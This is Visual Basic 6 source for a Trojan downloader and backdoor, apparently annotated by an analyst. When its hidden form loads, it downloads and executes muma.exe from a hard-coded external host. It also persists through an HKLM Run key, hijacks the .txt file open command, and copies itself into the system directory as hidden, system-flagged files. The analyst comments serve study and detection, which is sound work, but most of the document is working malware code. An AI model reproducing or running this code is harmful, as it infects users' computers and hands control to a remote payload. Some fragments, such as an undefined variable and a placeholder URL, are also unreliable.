VB下載者後門 
' Analyst summary of this declaration section (form module).
' The Win32 imports below cover URL download (urlmon), registry writes (advapi32)
' and path discovery (kernel32). In the visible listing only Sleep, URLDownloadToFile,
' RegCreateKey, RegSetValueEx, RegCloseKey, GetModuleFileName and GetSystemDirectory
' are called; GetTempPath, RegOpenKey and FindWindow are declared but never called.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)  
 
' Delay 1 second (author's note; the only visible Sleep call passes 100000 ms)
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long  
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long  
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long  
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long 
' Note that if you declare the lpData parameter as String, you must pass it By Value.  
' Autostart (Run) subkey; Form_Load opens it under HKEY_LOCAL_MACHINE.
Const Key_Run = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"  
' Declared but not referenced by the visible form code.
Private Const HKEY_CURRENT_USER = &H80000001  
Const HKEY_LOCAL_MACHINE = &H80000002  
Const REG_SZ = 1 
' REG_SZ: nul-terminated string (the ANSI "A" registry functions are the ones declared here)
' Module-level handle that receives the opened Run key in Form_Load.
Dim LhKey As Long  
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long  
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long  
Private Sys As String ' system directory
Private US As String ' full path of this executable
 
Private Tmp As String ' temporary folder
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long  
' SaveString: writes one REG_SZ value to the registry.
'   hKey     - root key handle passed to RegCreateKey
'   strPath  - subkey path, created or opened by RegCreateKey
'   strValue - value name
'   strData  - string data stored as REG_SZ
' Every API return code is assigned to R and never checked, so a failed write is silent.
' This helper is not called anywhere in the visible listing; Form_Load calls the
' registry APIs directly.
Private Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)  
Dim keyHand As Long  
Dim R As Long  
R = RegCreateKey(hKey, strPath, keyHand)  
' cbData is the byte length of the ANSI-converted string, so each Chinese character counts
' as 2 bytes. No terminating nul is added here, unlike the Len(Cp) + 1 used in Form_Load.
R = RegSetValueEx(keyHand, strValue, 0, REG_SZ, ByVal strData, LenB(StrConv(strData, vbFromUnicode)))
R = RegCloseKey(keyHand)  
End Sub  
' Form_Load: entry point of the sample; everything runs when the (hidden) form loads.
' Behaviour visible in this listing, in order, with the artefacts a defender can look for:
'   1. Downloads muma.exe over plain HTTP into the system directory if it is not there.
'   2. Writes the value "server" = <system dir>\system.exe under
'      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (autostart persistence).
'   3. Replaces the default value of HKEY_CLASSES_ROOT\txtfile\shell\open\command with
'      <system dir>\rund1132.exe %1 (file-association hijack for .txt files).
'   4. Copies itself to <system dir>\System.exe and <system dir>\rund1132.exe and marks
'      the latter read-only + hidden + system.
'   5. Loops until muma.exe exists in the system directory, then executes it.
' The file is fetched with no integrity or signature check before it is executed.
' The writes to HKLM, HKCR and the system directory presumably need administrative
' rights; with On Error Resume Next a failure leaves no visible error.
Private Sub Form_Load()  
' All runtime errors are suppressed from here on.
On Error Resume Next  
Dim RegEdit As Object, Apppath As String  
 
Dim Cp As String  
Dim Ret As Long  
Dim sCurrentPath As String, sSystemDir As String  
' Path of the running executable, rebuilt from App.Path and App.EXEName.
sCurrentPath = App.Path & "\" & App.EXEName & ".exe"  
' No window is shown to the user.
Form1.Visible = False  
Sys = String(255, 0)  
Ret = GetSystemDirectory(Sys, 255)  
Sys = Left(Sys, Ret) ' get the system directory
US = String(1024, 0) ' get own full path
Ret = GetModuleFileName(0, US, 1024)  
US = Left(US, InStr(US, Chr(0)) - 1)  
' "Temp" is not declared anywhere in the visible listing and GetTempPath is never called;
' Tmp is not used again below.
Tmp = Temp ' get the full temp directory
' Stage 1: fetch the payload only when it is not already present.
If Dir(Sys & "\" & "muma.exe") = "" Then  
 
' Hard-coded plain-HTTP URL; the return code in Ret is not checked.
Ret = URLDownloadToFile(0, "http://www.6dsoft.cn/muma.exe", Sys & "\muma.exe", 0, 0)  
 
End If  
Cp = Sys & "\system.exe" ' author's note: searching Google for inetdbs.exe turns up write-ups of this virus
' Persistence: Run-key value "server" pointing at the copy made further down.
Ret = RegCreateKey(HKEY_LOCAL_MACHINE, Key_Run, LhKey) ' write to the registry so it starts at boot
Ret = RegSetValueEx(LhKey, "server", 0&, REG_SZ, ByVal Cp, Len(Cp) + 1)  
Ret = RegCloseKey(LhKey)  
' Empty branch: the check on the module path has no effect in this listing.
If InStr(UCase(US), "INETDBS") = 0 Then  
End If  
 
' Apppath is computed here but not used afterwards in the visible code.
Apppath = IIf(Right(App.Path, 1) = "\", Left(App.Path, Len(App.Path) - 1), App.Path)  
 
' Get the current path; strip one trailing "\" when it is a root directory
 
Set RegEdit = CreateObject("WScript.Shell")  
 
' Rewrites the open command for the txtfile class so that opening a .txt file
' starts rund1132.exe with the document path as %1.
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", Sys & "\" & "rund1132" & ".exe %1"  
 
On Error Resume Next  
 
Dim cmd As String  
 
cmd = Command()  
 
' When started with an argument, hand it to Notepad.
' NOTE(review): presumably this keeps .txt files opening normally after the hijack - confirm.
If cmd <> "" Then  
 
Shell "NOTEPAD.EXE " & cmd, vbNormalFocus  
 
End If  
On Error Resume Next  
' Self-copy that the Run-key value above refers to.
FileCopy sCurrentPath, Sys & "\System.exe"  
On Error Resume Next  
' Self-copy that the txtfile open command refers to; the path is built with a doubled backslash.
FileCopy sCurrentPath, Sys & "\" & "\rund1132.exe"  
' 7 = vbReadOnly (1) + vbHidden (2) + vbSystem (4).
SetAttr Sys & "\" & "\rund1132.exe", 7  
' Check whether the program is already running
If App.PrevInstance Then  
End  
End If  
 
' Stage 2: wait until the payload exists in the system directory.
Do While Dir(Sys & "\" & "muma.exe") = ""  
 
' In this listing the URL argument is the literal placeholder "url".
Ret = URLDownloadToFile(0, "url", Sys & "\muma.exe", 0, 0)  
 
' 100000 ms, i.e. 100 seconds between attempts.
Call Sleep(100000)  
Loop 
 
 
' Executes the downloaded file.
Shell Sys & "\" & "muma" & ".exe", vbNormalFocus  
 
End Sub  
 
模組:  
' Standard module: public copies of the registry constants and API declarations.
' The form above declares its own private RegOpenKey / RegCreateKey / RegSetValueEx /
' RegCloseKey and HKEY_CURRENT_USER. REG_DWORD is not referenced by the visible form code.
Option Explicit  
Public Const HKEY_CURRENT_USER = &H80000001  
Public Const REG_DWORD = 4  
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long  
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long  
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long  